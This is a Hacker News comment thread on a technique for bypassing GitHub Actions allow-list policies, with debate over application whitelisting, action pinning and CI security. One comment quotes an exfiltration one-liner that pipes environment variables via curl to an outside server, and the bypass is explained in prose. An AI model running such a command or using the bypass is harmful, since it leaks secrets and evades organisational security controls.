236 points by woodruffw 2 days ago | 25 comments
kj4ips 2 days ago
This is a prime example of "If you make an unusable secure system, the users will turn it into an insecure usable one."

If someone is actively subverting a control like this, it probably means that the control has morphed from a guardrail into a log across the tracks.

Somewhat in the same vein as AppLocker &co. Almost everyone says you should be using it, but almost no-one does, because it takes a massive amount of effort just to understand what "acceptable software" is across your entire org.

welshwelsh 1 day ago
Nobody outside of the IT security bubble thinks that using AppLocker is a sensible idea.

Companies have no business telling their employees which specific programs they can and cannot run to do their jobs, that's an absurd level of micromanagement.

neilv 1 day ago
> Companies have no business telling their employees which specific programs they can and cannot run to do their jobs, that's an absurd level of micromanagement.

I'm usually on the side of empowering workers, but I believe sometimes the companies do have business saying this.

One reason is that much of the software industry has become a batpoop-insane slimefest of privacy (IP) invasion, as well as grossly negligent security.

Another reason is that the company may be held liable for license terms of the software.

Another reason is that the company may be held liable for illegal behavior of the software (e.g., if the software violates some IP of another party).

Every piece of software might expose the company to these risks. And maybe disproportionately so, if software is being introduced by the "I'm gettin' it done!" employee, rather than by someone who sees vetting for the risks as part of their job.

janstice 1 day ago
For example, if someone installs the wrong version of Oracle Java on a VM in our farm, the licencing cost is seven figures as they want to charge per core that it could conceivably run on - this would be career-limiting for a number of people at once.
kstrauser 22 hours ago
Or VirtualBox’s extensions which make it usable. Those are free to download but could make you an audit target.
janstice 11 hours ago
Or even Docker Desktop, which is a bunch of $$ that no-one expects (and I think Microsoft is still recommending in the WSL docs).
josefx 21 hours ago
Is there still a reason to use VirtualBox?
kstrauser 21 hours ago
IMO, no. Maybe inertia from people who learned it long ago and stopped looking at the alternatives.
lelandbatey 1 day ago
Developers are going to write code to do things for them, such as small utility programs for automating work. Each custom program is a potentially brand new binary, never sent before by the security auditing software. Does every program written by every dev have to be cleared? Is it best in such a system to get an interpreter cleared so I can use that to run whatever scripts I need?
degamad 1 day ago
If I have an internal developer in such a scenario, then what makes most sense to me is to issue them a code-signing certificate or equivalent, and whitelisting anything signed by that certificate[1], combined with logging and periodic auditing to detect abuse.

[1] <https://learn.microsoft.com/en-us/windows/security/applicati...>

viraptor 1 day ago
> Does every program written by every dev have to be cleared?

No, that's not how things are implemented normally, exactly because they wouldn't work.

gabeio 1 day ago
> No, that's not how things are implemented normally, exactly because they wouldn't work.

I used to work for a gov't contractor. I wrote a ~10 line golang http server, just because at the time golang was still new (this was years ago) and I wanted to try it. Not even 2 minutes later I got a call from the IT team asking a bunch of questions about why I was running that program (the http server not golang). I agree the practice is dumb but there are definitely companies who have it setup that way.

viraptor 1 day ago
So running it wasn't prevented for you, and new apps listening on the network trigger notifications that the IT checks on immediately. That sounds like a reasonable policy.
macintux 1 day ago
Around 1998 I snagged an abandoned 486 and installed Linux on it for use at work; the corporate software I used the most, a ticketing system, could be run using X from a Solaris server. I don't remember what I did for Lotus Notes.

Anyway, the IT department spotted it but since I was using SMB it thought it was just another Windows server. No one ever checked up on it despite being plugged into the corporate network.

This was a Fortune 500 company; things have changed a wee bit since then.

shanipribadi 1 day ago
had something similar happened a few years back.. basically the go binaries i compiled and run would get deleted every time I try to run it. usually just downloading the newer version of go compiler and recompile with that solves it (I think it got flagged because it was compiled with an older version of go compiler with known vulnerabilities). Every time it happened I think IT security got a notification, cos they would reach out to me afterwards. The few times upgrading to the latest go version didn't work (false positives), I would just name the binary something like "Dude, wake up", or "dude, I need this to get whitelisted", and do the compile-run-binary_got_deleted cycle 10-20 times, effectively paging the IT security guy until they reached out to me and whitelist things for me :-D.
xmprt 1 day ago
This is a strawman argument. If a developer writes code that does something malicious then it's on the developer. If they install a program then the accountability is a bit fuzzier. It's partly on the developer, partly on security (for allowing an unprivileged user to do malicious/dangerous things even unknowingly), and partly on IT (for allowing the unauthorized program to run without any verification).
lelandbatey 1 day ago
It's not a straw man, I'm not trying to defuse liability. Of course a developer running malicious code they wrote is responsible for the outcomes.

I am pointing out that if every unique binary never before run/approved is blocked, then no developer will be able to build and then run the software they are paid to write, since them developing it modifies said software into a new and never before seen sequence of bits.

OP may not have meant to say that "it's good to have an absolute allowlist of executable signatures and block everything else", but that is how I interpreted the initial claim and I am merely pointing out that such a system would be more than inconvenient, it'd make the workflow of editing and then running software nearly impossible.

TheNewsIsHere 1 day ago
Your premise assumes there are policies and technologies in place that restrict what a developer can do.

This is often the case, although I’ve very rarely seen environments as restrictive as what you describe being enforced on developers.

Typically developer user accounts and assigned devices are in slightly less restrictive policy groupings, or are given access to some kind of remote build/test infrastructure.

Of course companies need the option to control what software is run on their infrastructure. There are an endless stream of reasons and examples for that. Up-thread there’s a great example of what happens when you let folks install Oracle software without guardrails. Businesses are of course larger and more complex than their developers and have needs beyond their developers.

What matters here is implementation and policy management. You want those to be balanced between audience needs and business needs.

It’s also worth mentioning that plenty of developers have no clue what they’re doing with computers outside their particular area of expertise.

rainonmoon 1 day ago
It's a straw man in that you're establishing an inherently facile and ridiculous scenario just to knock it down. A scenario that, as others have demonstrated, is not grounded in any logical reality. "Nobody mentioned this imaginary horrible system I just thought of, but if they had, it sure would be terrible" is quite a hill to die on.
zmgsabst 1 day ago
Developers are generally given specific environments to run code, which aren’t their laptops — eg, VMs in a development environment.

The goal isn’t to stop a developer from doing something malicious, but to add a step to the chain for hackers to do something malicious: they need to pwn the developer laptop from the devbox before they can pivot to, eg, internal data systems.

kstrauser 22 hours ago
In my experience, that’s rare. Everywhere I’ve worked had devs working on code directly on their laptops.
zmgsabst 15 hours ago
My experience is the opposite:

I haven’t worked somewhere we ran code locally in a long, long time. Your IDE is local, but the testing is remote — typically in an environment where you can match the runtime environment more closely (eg, ensuring the same dependencies, access to cloud resources, etc).

tough 13 hours ago
isn't that just CI?

does that mean you will never compile it or build it locally?

don't 99% of people just use docker nowadays to have all that environment matches?

nradov 1 day ago
That level of micromanagement can be quite sensible depending on the employee role. It's not needed for developers doing generic software work without any sensitive data. But if the employee is, let's say, a nurse doing medical chart review at an insurance company then there is absolutely no need for them to use anything other than specific approved programs. Allowing use of random software greatly increases the potential attack surface area, and in the worst case could result in something like a malware penetration and/or HIPAA privacy violation.
bigfatkitten 1 day ago
Anyone who’s been sued by Oracle for not paying for Java SE runtime licences thinks it’s an outstanding idea.

https://itwire.com/guest-articles/guest-opinion/is-an-oracle...

Security practitioners are big fans of application whitelisting for a reason: Your malware problems pretty much go away if malware cannot execute in the first place.

The Australian Signals Directorate for example has recommended (and more recently, mandated) application whitelisting on government systems for the past 15 years or so, because it would’ve prevented the majority of intrusions they’ve investigated.

https://nsarchive.gwu.edu/sites/default/files/documents/5014...

viraptor 1 day ago
AppLocker is effectively an almost perfect solution to ransomware. (On the employee desktops anyway) You can plug lots of random holes all day long or just whitelist what can be run in the first place. Ask M&S management today if they prefer to keep working with paper systems for the another month, or would they prefer to deal with AppLocker.
moooo99 1 day ago
> Companies have no business telling their employees which specific programs they can and cannot run to do their jobs, that's an absurd level of micromanagement.

This is a lovely take if your business exclusively running on FOSS on premise software, but is a receipe for some hefty bills from software vendors due to people violating licensing conditions

kstrauser 22 hours ago
> Companies have no business telling their employees which specific programs they can [run]

Agreed.

> and cannot run

I strongly disagree. I think those controls are great for denylists. For example, almost no one needs to run a BitTorrent client on their work laptops. (I said almost. If you’re one of them, make a case to your IT department.) Why allow it? Its presence vastly increases the odds of someone downloading porn (risk: sexual harassment) or warez (risks: malware, legal issues) with almost no upside to the company. I’m ok with a company denylisting those.

I couldn’t care less if you want to listen to Apple Music or Spotify while you work. Go for it. Even though it’s not strictly work-related, it makes happier employees with no significant downside. Want to use Zed instead of VSCode? Knock yourself out. I have no interest in maintaining an allowlist of vetted software. That’s awful for everyone involved. I absolutely don’t want anyone running even a dev version of anything Oracle in our non-Oracle shop, though, and tools to prevent that are welcome.

protocolture 1 day ago
>Companies have no business telling their employees which specific programs they can and cannot run to do their jobs, that's an absurd level of micromanagement.

Yet so many receptionists think that the application attached to the email sent by couriercompany@hotmail.com is a reasonable piece of software to run. Curious.

samplatt 1 day ago
False dichotomy. The manager of the receptionist, or the head of their department, can decide what's appropriate for their job and dictate this to IT, and then they can lock it down.

At my work currently IT have the first say and final say on all software, regardless of what it does or who is using it. It's an insane situation. Decisions are being made without any input from anyone even in the department of the users using the software... you know... the ones that actually make the company money...

davkan 1 day ago
No, it’s unreasonable for end users and non technical managers to simply dictate to IT what software is to be installed on corporate devices. They can submit requests to IT with a business justification which should be approved if can be accommodated.

Maybe your employer’s IT department is in the habit of saying no without a proper attempt to accommodate which can be a problem but, the solution is not to put the monkeys in charge of the zoo.

At my old job we had upper management demanding exceptions to office modern auth so they could use their preferred email apps. We denied that, there was no valid business justification that outweighed the security risk of bypassing MFA.

We then allowed a single exception to the policy for one of our devs as they were having issues with Outlook’s plaintext support when submitting patches to the LKML. Clear and obvious business justification without an alternative gets rubber stamped.

Security is a balance that can go too far in either direction. Your workstations probably don’t need to be air gapped, and susan from marketing probably shouldn’t be able to install grammarly.

samplatt 11 hours ago
>No, it’s unreasonable for end users and non technical managers to simply dictate to IT

Again, false dichotomy. It's possible to meet in the middle, collaborate and discuss technical requirements. It's just that that rarely happens.

Our software (built by us, has regular code reviews and yearly external security audits and is internal-use-only amongst electrical engineers and computer-science guys) regularly gets disabled or removed by IT without warning by accident, and it's usually a few days before it's re-enabled/able to be reinstalled, since the tiny IT dept is forced to rely on external agencies to control their white-listing software.

Your "monkeys in charge of the zoo" metaphor is in full effect at my workplace, but in this case, the monkeys are IT and their security theater.

davkan 10 hours ago
> The manager of the receptionist, or the head of their department, can decide what's appropriate for their job and dictate this to IT, and then they can lock it down.

You said exactly that.

Again, maybe your IT team is garbage, I don’t really care to litigate your issue with them. I specifically said IT should accommodate requests when possible and not be overzealous when saying no.

What you previously suggested is that is that stakeholders should give their demands to IT and that IT should figure out how to make it happen. Doesn’t sound like collaboration to me.

In my experience end users and management are very rarely aware of the requirements placed upon IT to ensure the security of company infrastructure when it comes passing audits, whether that’s for cyber insurance, or CMMC compliance or whatever else.

It’s plainly obvious that products don’t exist to sell without developers or engineers. But you can’t sell your product to customers if they require SOC and you don’t have it or if your entire infrastructure gets ransomwared.

I’ve had to tell very intelligent and hard working people that if I accommodated their request the government would no longer buy products from our company.

samplatt 10 hours ago
>What you previously suggested is that is that stakeholders should give their demands to IT and that IT should figure out how to make it happen. Doesn’t sound like collaboration to me.

That's fair; I did make it sound pretty one-sided there.

protocolture 16 hours ago
>At my work currently IT have the first say and final say on all software, regardless of what it does or who is using it.

Yeah but software isnt software.

Like I have a customer with users that just randomly started using VPN software to manage their client sites. VPN software that exposes the user machine directly to uncontrolled networks. This causes risks in both directions, because their clients run things like datacenters and power stations. Increases security risks for their business, and increases security risks for their customers, not to mention liability.

IT should be neutral. but IT done right, is guided by best practice. IT is ultimately responsible and accountable for security and function. You cant be responsible and accountable without control, or you exist just to be beaten up when shit goes sideways.

>the ones that actually make the company money...

Making the company money in an uncontrolled fashion is just extra distance to fall. If you ship a fantastic product with a massive supply chain induced vuln that destroys your clients there was no point in making that money in the first place.

solumos 2 days ago
The implied fix to the “unusable secure system” is forking the checkout action to your org and referencing it there.
hiatus 1 day ago
That's not a fix though is it? Git tools are already on the runner. You could checkout code from public repos using cli, and you could hardcode a token into the workflow if you wanted to access a private repo (assuming the malicious internal user doesn't have admin privileges to add a secret).
monster_truck 2 days ago
Had these exact same thoughts while I was configuring a series of workflows and scripts to get around the multiple unjustified and longstanding restrictions on what things are allowed to happen when.

That sinking feeling when you search for how to do something and all of the top results are issues that were opened over a decade ago...

It is especially painful trying to use github to do anything useful at all after being spoiled by working exclusively from a locally hosted gitlab instance. I gave up on trying to get things to cache correctly after a few attempts of following their documentation, it's not like I'm paying for it.

Was also very surprised to see that the recommended/suggested default configuration that runs CodeQL had burned over 2600 minutes of actions in just a day of light use, nearly doubling the total I had from weeks of sustained heavy utilization. Who's paying for that??

EatFlamingDeath 5 hours ago
I've been saying for years, GitHub Actions is alpha software.
Already__Taken 1 day ago
I'm baffled you can't clone internal/private repos with anything other than a developer PAT. They have a UI to share access for workflows, let cloning use that...
notpushkin 1 day ago
SSH also works, but I’d love to be able to just use git-credential-oauth [0] like for any other repo.

[0]: https://github.com/hickford/git-credential-oauth

throwaway52176 1 day ago
I use GitHub apps for this, it’s cumbersome but works.
Arbortheus 19 hours ago
Use a GitHub app, that’s what it’s for.
saghm 1 day ago
It used 1.8 days of time to run for a single day? I'm less curious about who's paying for it than who's _using _ it on your repo, because I can't even imagine having an average of almost two people scanning a codebase every single minute of the day.
heelix 1 day ago
Not the OP, but a poorly behaving repo can turn and burn for six hours on every PR, rather than the handful of minutes one would expect. It happens - but usually that sort of thing should be spotted and fixed. More often then not, something is trying to pull artifacts and timing out rather than it being a giant monorepo.
monster_truck 21 hours ago
Have you looked at the default configuration? It runs any time there is a push to main.
TheTaytay 1 day ago
I don’t understand the risk honestly.

Anyone who can write code to the repo can already do anything in GitHub actions. This security measure was never designed to mitigate against a developer doing something malicious. Whether they clone another action into the repo or write custom scripts themselves, I don’t see how GitHub’s measures could protect against that.

woodruffw 1 day ago
A mitigation for this exact policy mechanism is included in the post.

(The point is not directly malicious introductions: it's supply chain risk in the form of engineers introducing actions/reusable workflows that are themselves malleable/mutable/subject to risk. A policy that claims to do that should in fact do it, or explicitly document its limitations.)

hk1337 1 day ago
I haven't tested this but the main risk that is possible is users creating PRs on public repositories with actions that run on pull request.
1oooqooq 23 hours ago
if your unprotect pr job can have side effects besides accessing the public repo and returning a boolean for passing status, what hope is there?
throwaway290 21 hours ago
any job can have side effects so there is no hope indeed
SchemaLoad 1 day ago
Companies that care about this kind of thing usually have the CI config on another repo from the actual code so you can't just rewrite it to deploy your dev branch straight to prod.
SamuelAdams 1 day ago
The risk is simple enough. GitHub Enterprise allows admins to configure a list of actions to allow or deny. Ideally these actions are published in the GitHub Marketplace.

The idea is that the organization does not trust these third-parties, therefore they disable their access.

However this solution bypasses those lists by cloning open-source actions directly into the runner. At that point it’s just running code, no different from if the maintainers wrote a complex action themselves.

x0x0 1 day ago
The risk is the same reason we don't allow any of our servers to make outgoing network connections except to a limited host lists. eg backend servers can talk to the gateway, queue / databases, and an approved list of domains for apis and nothing else.

The same guard helps prevent accidents, not maliciousness, and security breaches. If code somehow gets onto our systems, but we prevent most outbound connections, exfiltrating is much harder.

Yes, people do code review but stuff slips through. See eg Google switching one of their core libs that did mkdir with a shell to run mkdir -p (tada! every invocation better understand shell escaping rules). That made it through code review. People are imperfect; telling your network no outbound connections (except for this small list) is much closer to perfect.

paulddraper 1 day ago
Well…you’re right.

The dumb thing is GitHub offers “action policies” pretending they actually do something.

hk1337 2 days ago
This is why I avoid using non-official actions where possible and always set a version for the action.

We had a contractor that used some random action to ssh files to the server and referenced master as the version to boot. First, ssh isn't that difficult to upload files and run commands but the action owner could easily add code to save private keys and information to another server.

I am a bit confused on the "bypass" though. Wouldn't the adversary need push access to the repository to edit the workflow file? So, the portion that needs hardening is ensuring the wrong people do not have access to push files to the repository?

On public repositories I could see this being an issue if they do it in a section of the workflow that is run when a PR is created. Private repositories, you should take care with who you give access.

gawa 1 day ago
> This is why I avoid using non-official actions where possible and always set a version for the action.

Those are good practices. I would add that pinning the version (tag) is not enough, as we learnt with the tj-actions/changed-files event. We should pin the commit sha.[0]. Github states this in their official documentation [1] as well:

> Pin actions to a full length commit SHA

> Pin actions to a tag only if you trust the creator

[0] https://www.stepsecurity.io/blog/harden-runner-detection-tj-...

[1] https://docs.github.com/en/actions/security-for-github-actio...

jand 1 day ago
> I am a bit confused on the "bypass" though. Wouldn't the adversary need push access to the repository to edit the workflow file? So, the portion that needs hardening is ensuring the wrong people do not have access to push files to the repository?

I understand it that way, too. But: Having company-wide policies in place (regarding actions) might be misunderstood/used as a security measure for the company against malicious/sloppy developers.

So documenting or highlighting the behaviour helps the devops guys avoid a wrong sense of security. Not much more.

XCabbage 1 day ago
I don't see the vulnerability. In fact, I think considering this a problem at all is ridiculous.

Obviously it's impossible to block all ways of "bypassing" the policy. If you are a developer who has already been entrusted with the ability to make your GitHub Actions workflows run arbitrary code, then OF COURSE you can make it run the code of some published action, even if it's just by manual copy and paste. This fact doesn't need documenting because it's trivially obvious that it could not possibly be any other way.

Nor does it follow from this that the existence of the policy and the limited automatic enforcement mechanism is pointless and harmful. Instead of thinking of the enforcement mechanism as a security control designed to outright prevent a malicious dev from including code from a malicious action, instead think of it more like a linting rule: its purpose is to help the developer by bringing the organisation's policy on third party actions to the dev's attention and pointing out that what they are trying to do breaks it.

If they decide to find a workaround at that point (which of course they CAN do, because there's no feasible way to constrain them from doing so), that's an insubordination issue, just like breaking any other policy. Unless his employer has planted a chip in his brain, an employee can also "bypass" the sexual harassment policy "in the dumbest way possible" - just walk up to Wendy from HR and squeeze her tits! There is literally no technical measure in place to make it physically impossible for him do so. Is the sexual harassment policy therefore also worse than nothing, and is it a problem that the lack of employee brain chips isn't documented?

crabbone 20 hours ago
Yes and no.

The problem of audit of third-party code is real. Especially because of the way GitHub allows embedding it in users' code: it's not centralized, doesn't require signatures / authentication.

But, I think, the real security-minded approach here should be at the container infrastructure level. I.e. security policies should apply to things like container network in the way similar to security groups in popular cloud providers, or executing particular system calls, or accessing filesystem paths.

Restrictions on the level of what actions can be mentioned in the "manifest" are just a bad approach that's not going to stop anyone.

OptionOfT 1 day ago
We forked the actions as a submodule, and then pointed the uses to that directory.

That way we were still tracking the individual commits which we approved as a team.

Now there is interesting dichotomy. On one hand PMs want us to leverage GitHub Actions to build out stuff more quickly using pre-built blocks, but on the other hand security has no capacity or interest to whitelist actions (not to mention that the whitelist list is limited to 100 actions as per the article).

That said, even tagging GitHub actions with a sha256 isn't perfect for container actions as they can refer to a tag, and the contents of that tag can be changed: https://docs.github.com/en/actions/sharing-automations/creat...

E.g. I publish an action with code like

   runs:
     using: 'docker'
     image: 'docker://optionoft/actions-tool:v3.0.0'
You use the action, and pin it to the SHA of this commit.

I get hacked, and a hacker publishes a new version of optionoft/actions-tool:v3.0.0

You wouldn't even get a Dependabot update PR.

danudey 23 hours ago
You can sign images, and then theoretically validate those signatures; if an image changes it no longer matches the signature.

Optionally, you can tell your action to reference the docker image by sha256 hash also, in which case it's effectively immutable.

opello 1 day ago
Maybe there's a future Dependabot feature to create FYI issues when in use tags change?
wereHamster 1 day ago
securityscorecard is easy to integrate (it's a cli tool or you run it as a github action), one of the checks it performs is "Pinned-Dependencies": https://github.com/ossf/scorecard/blob/main/docs/checks.md#p.... Checks that fail generate an security alert under Security -> Code scanning.
OptionOfT 1 day ago
Is it transitive?

> The check works by looking for unpinned dependencies in Dockerfiles, shell scripts, and GitHub workflows which are used during the build and release process of a project.

Does it detect an unpinned (eg a Docker tag) of a pinned dependency.

fkyoureadthedoc 1 day ago
This doesn't seem like a big deal to be honest.

My main problem with the policy and how it's implemented at my job is that the ones setting the policies aren't the ones impacted by them, and never consult people who are. Our security team tells our GitHub admin team that we can't use 3rd party actions.

Our GitHub admin team says sure, sounds good. They don't care, because they don't use actions, and they in fact don't delivery anything at all. Security team also delivers nothing, so they don't care. Combined, these teams crowning achievement is buying GitHub Enterprise and moving it back and forth between cloud and on prem 3 times in the last 7 years.

As a developer, I'll read the action I want to use, and if it looks good I just clone the code and upload it into our own org/repo. I'm already executing a million npm modules in the same context that do god knows what. If anyone complains, it's getting hit by the same static/dynamic analysis tools as the rest of the code and dependencies.

mook 1 day ago
It sounds like reading the code and forking it (therefore preventing malicious updates) totally satisfies the intent behind the policy, then.

My company has a similar whitelist of actions, with a list of third-party actions that were evaluated and rejected. A lot of the rejected stuff seems to be some sort of helper to make a release, which pretty much has a blanket suggestion to use the `gh` CLI already on the runners.

1 day ago
clysm 1 day ago
I’m not seeing the security issue here. Arbitrary code execution leads to arbitrary code execution?

Seems like policies are impossible to enforce in general on what can be executed, so the only recourse is to limit secret access.

Is there a demonstration of this being able to access/steal secrets of some sort?

mystifyingpoi 1 day ago
> Seems like policies are impossible to enforce

The author relates to exactly that: "ineffective policy mechanisms are worse than missing policy mechanisms, because they provide all of the feeling of security through compliance while actually incentivizing malicious forms of compliance."

And I totally agree. It is so abundant. "Yes, we are in compliance with all the strong password requirements, strictly speaking there is one strong password for every single admin user for all services we use, but that's not in the checklist, right?"

dijksterhuis 1 day ago
It's less of an "use this to do nasty shit to a bunch of unsuspecting victims" one, and more of a "people can get around your policies when you actually need policies that limit your users".

1. BigEnterpriseOrg central IT dept click the tick boxes to disable outside actions because <INSERT SECURITY FRAMEWORK> compliance requires not using external actions [0]

2. BigBrainedDeveloper wants to use ExternalAction, so uses the method documented in the post because they have a big brain

3. BigEnterpriseOrg is no longer compliant with <INSERT SECURITY FRAMEWORK> and, more importantly, the central IT dept have zero idea this is happening without continuously inspecting all the CI workflows for every team they support and signing off on all code changes [1]

That's why someone else's point of "you're supposed to fork the action into your organisation" is a solution if disabling local `uses:` is added as an option in the tick boxes -- the central IT dept have visibility over what's being used and by whom if BigBrainedDeveloper can ask for ExternalAction to be forked into BigEnterpriseOrg GH organisation. Central IT dept's involvement is now just review the codebase, fork it, maintain updates.

NOTE: This is not a panacea against all things that go against <INSERT SECURITY FRAMEWORK> compliance (downloading external binaries etc). But it would be an easy gap getting closed.

----

[0]: or something, i dunno, plenty of reasons enterprise IT depts do stuff that frustrates internal developers

[1]: A sure-fire way to piss off every single one of your internal developers.

bob1029 1 day ago
I feel like GitHub's CI/CD offering is too "all-in" now. Once we are at a point where the SCM tool is a superset of AWS circa 2010, we probably need to step back and consider alternatives.

A more ideal approach could be to expose a simple rest API or webhook that allows for the repo owner to integrate external tooling that is better suited for the purpose of enforcing status checks.

I would much rather write CI/CD tooling in something like python or C# than screw around with yaml files and weird shared libraries of actions. You can achieve something approximating this right now, but you would have to do it by way of GH Actions to some extent.

PRs are hardly latency sensitive, so polling a REST API once every 60 seconds seems acceptable to me. This is essentially what we used to do with Jenkins, except we'd just poll the repo head instead of some weird API.

masklinn 1 day ago
> A more ideal approach could be to expose a simple rest API or webhook that allows for the repo owner to integrate external tooling that is better suited for the purpose of enforcing status checks.

That... has existed for years? https://docs.github.com/en/rest?apiVersion=2022-11-28

That was the only thing available before github actions. That was also the only thing available if you wanted to implement the not rocket science principle before merge queues.

It's hard to beat free tho, especially for OSS maintainership.

And GHA gives you concurrency you'd have to maintain an orchestrator (or a completely bespoke solution), just create multiple jobs or workflow.

And you don't need to deal with tokens to send statuses with. And you get all the logs and feedback in the git interface rather than having to BYO again. And you can actually have PRs marked as merged when you rebased or squashed them (a feature request which is now in middle school: https://github.com/isaacs/github/issues/2)

> PRs are hardly latency sensitive, so polling a REST API once every 60 seconds seems acceptable to me.

There is nothing to poll: https://docs.github.com/en/webhooks/types-of-webhooks

korm 1 day ago
GitHub has both webhooks and an extensive API. What you are describing is entirely doable, nothing really requires GitHub Actions as far as I know.

Most people opt for it for convenience. There's a balance you can strike between all the yaml and shared actions, and running your own scripts.

sureglymop 1 day ago
I don't understand GitHubs popularity in the first place... You have git as the interoperable version control "protocol" but then slap proprietary issue, PR, CI and project management features on top that one couldn't bring with when migrating away? At that stage what is even the point of it being built on git? Also, for all that is great about git, I don't think it's the best version control system we could have at all. I wish we'd do some serious wheel reinventing here.
bob1029 1 day ago
What do you think a more ideal VCS would look like?
hiatus 2 days ago
That the policy can be "bypassed" by a code change doesn't seem so severe. If you are not reviewing changes to your CI/CD workflows all hope is lost. Your code could be exfiltrated, secrets stolen, and more.
woodruffw 2 days ago
The point of the post is that review is varied in practice: if you’re a large organization you should be reviewing the code itself for changes, but I suspect many orgs aren’t tracking every action (and every version of every action) introduced in CI/CD changes. That’s what policies are useful for, and why bypasses are potentially dangerous.

Or as an intuitive framing: if you can understand the value of branch protection and secret pushing policies for helping your junior engineers, the same holds for your CI/CD policies.

hiatus 1 day ago
The problem is not related to tracking every action or version in CI/CD changes. Right now, you can just curl a binary and run that. How is that any different from the exploit here? I guess people may have had a false sense of security if they had implemented those policies, but I would posit those people didn't really understand their CI/CD system if they thought those policies alone would prevent arbitrary code execution.
woodruffw 1 day ago
I think it's a difference in category; pulling random binaries from the Internet is obviously not good, but it's empirically mostly done in a pointwise manner. Actions on the other hand are pulled from a "marketplace", are subject to automatic bumps via things like Dependanbot and Renovate, can be silently rewritten thanks to tag mutability, etc.

Clearly in an ideal world runners would be hermetic. But I think the presence of other sources of non-hermeticity doesn't justify a poorly implemented policy feature on GitHub's part.

solumos 2 days ago
“We only allow actions published by our organization and reusable workflows”

and

“We only allow actions published by our organization and reusable workflows OR ones that are manually downloaded from an outside source”

are very very different policies

hiatus 1 day ago
But there is no policy preventing external downloads in general, is there? I can curl a random script from a malicious website, too.
internobody 2 days ago
It's not simply a matter of review; depending on your setup these bypasses could be run before anyone even has eyes on the changes if your CI is triggered on push or on PR creation.
jadamson 2 days ago
`pull_request_target` (which has access to secrets) runs in the context of the destination branch, so any malicious workflow would need to have already been committed.

GitHub has a page on this:

https://securitylab.github.com/resources/github-actions-prev...

rawling 2 days ago
But similarly, couldn't you just write harmful stuff straight into the action itself?
mystifyingpoi 1 day ago
You definitely could, but it is more nuanced than that. You really don't want to be seen doing `env | curl -X POST http://myserver.cn` in a company repository. But using a legitly named action doesn't look too suspicious.
b0a04gl 5 hours ago
its blind to the actual execution path. anyone with push access can run whatever they want anyway. and the fact that it only scans static uses: entries just means teams will start pulling stuff in manually. all of this should’ve been obvious from the beginning
throwaway889900 2 days ago
Not only can you yourself manually check out a specific repo, but if you have submodules and do a recursive checkout, it's also possible to pull in other security nightmares from places you never expected now. That would be one complicated attack to pull off though, chain of compromised workflows haha
ghusto 2 days ago
> world’s dumbest policy bypass: instead of doing uses: actions/checkout@v4, the user can git clone (or otherwise fetch) the actions/checkout repository into the runner’s filesystem, and then use uses: ./path/to/checkout to run the very same action

Good lord.

This is akin to saying "Instead of doing `apt-get install <PACKAGE>`, one can bypass the apt policies by downloading the package and running `dpkg -i <PACKAGE>`.

woodruffw 2 days ago
I think a salient difference is that apt policies apply to apt, which GitHub goes to extents to document GitHub Actions policies as applying to `uses:` clauses writ large.

(But also: in a structural sense, if a system did have `apt` policies that were intended to prevent dependency introduction, then such a system should prevent that kind of bypass. That doesn't mean that the bypass is life-or-death, but it's a matter of hygiene and misuse prevention.)

gawa 1 day ago
> which GitHub goes to extents to document GitHub Actions policies as applying to `uses:` clauses

If it were phrased like this then you would be right. The docs would give a false sense of security, would be misleading. So I went to check, but I didn't find such assertion in the linked docs (please let me know if I missed it) [0]

So I agree with the commenter above (and Github) that "editing the github action to add steps to download a script and running" is not a fundamental flaw of this system designed to do exactly that, to run commands as instructed by the user.

Overall we should always ask ourselves: what's the threat model here? If anyone can edit the Github Action, then we can make it do a lot of things, and this "Github Action Policy" filter toggle is the last of our worry. The only way to make the CI/CD pipeline secure (especially since the CD part usually have access to the outside world) is to prevent people from editing and running anything they want in it. It means preventing the access of users to the repository itself in the case off Github Actions.

[0] https://blog.yossarian.net/2025/06/11/github-actions-policie...

woodruffw 1 day ago
That's from here[1].

I suppose there's room for interpretation here, but I think an intuitive scan of "Allowing select actions and reusable workflows to run" is that the contrapositive ("not allowed actions and reusable workflows will not run") also holds. The trick in the post violates that contrapositive.

I think people are really getting caught up on the code execution part of this, which is not really the point. The point is that a policy needs to be encompassing to have its intended effect, which in the case of GitHub Actions is presumably to allow large organizations/companies to inventory their CI/CD dependencies and make globally consistent, auditable decisions about them.

Or in other words: the point here is similar to the reason companies run their own private NPM, PyPI, etc. indices -- the point is not to stop the junior engineers from inserting shoddy dependencies, but to know when they do so that remediation becomes a matter of policy, not "find everywhere we depend on this component." Bypassing that policy means that the worst of both worlds happens: you have the shoddy dependency and the policy-view of the world doesn't believe you do.

[1]: https://docs.github.com/en/repositories/managing-your-reposi...

qbane 2 days ago
Also you can leak any secrets by making connections to external services via internet and simply send secrets to them.
mystifyingpoi 1 day ago
You can also print them to console in quadruple base64 in reverse, the trick is getting away with it.
formerly_proven 1 day ago
Not in many enterprisey CI systems you can't, those frequently have hermetic build environments.
msgodel 1 day ago
Nothing makes me want to quit software more than enterprisey CI systems.
qbane 1 day ago
I think GitHub is correct that the bypass itself is not a vulnerability, but just like the little tooltip on GitHub's "create secret gist" button, GitHub can do a better job clarifying at the "Actions permissions" section.
1 day ago
john-h-k 1 day ago
There is no meaningful way to get around this. Ban them in `uses:` keys? Fine, they just put it in a bash script and run that. Etc etc. If it allows running arbitrary code, this will always exist
akoboldfrying 1 day ago
I agree that their proposed "fix" is not a fix at all, due to the fact that you can run arbitrary shell commands that achieve the same thing.

OTOH, if in addition to restricting to a whitelist of actions you completely forbid ad hoc shell commands (i.e., `run:` blocks), now you have something that can be made secure.

0xbadcafebee 1 day ago
You call it a security issue. I call it my only recourse when the god damn tyrannical GitHub Org admins lock it down so hard I can't do my job.

(yes it is a security issue (as it defeats a security policy) but I hope it remains unfixed because it's a stupid policy)

chelmzy 1 day ago
Does anyone know how to query what actions have been imported from the Actions Marketplace (or anywhere) in Github enterprise? I've been lazily looking into this for a bit and can't find a straight answer.
2 days ago
jamesblonde 1 day ago
Run data integration pipelines with Github actions -

https://dlthub.com/docs/walkthroughs/deploy-a-pipeline/deplo...

It's the easiest way for many startups to get people to try out your software for free.

solatic 1 day ago
If your Security folk are trying to draw up a wall around the enterprise (prevent using stuff not intentionally mirrored in) but there are no network controls - no IP address based firewalls, no DNS firewalls, no Layer 7 firewalls (like AWS VPC Endpoint Policy or GCP VPC Service Controls) governing access to object storage and the like.... Quite frankly, the implementation is either immature or incompetent.

If you work for an org with restrictive policy but not restrictive network controls, anyone at work could stand up a $5 VPS and break the network control. Or a Raspberry Pi at home and DynDNS. Or a million others.

Don't be stupid and think that a single security control means you don't need to do defense in depth.

bluelightning2k 1 day ago
I don't think this is a security flaw.

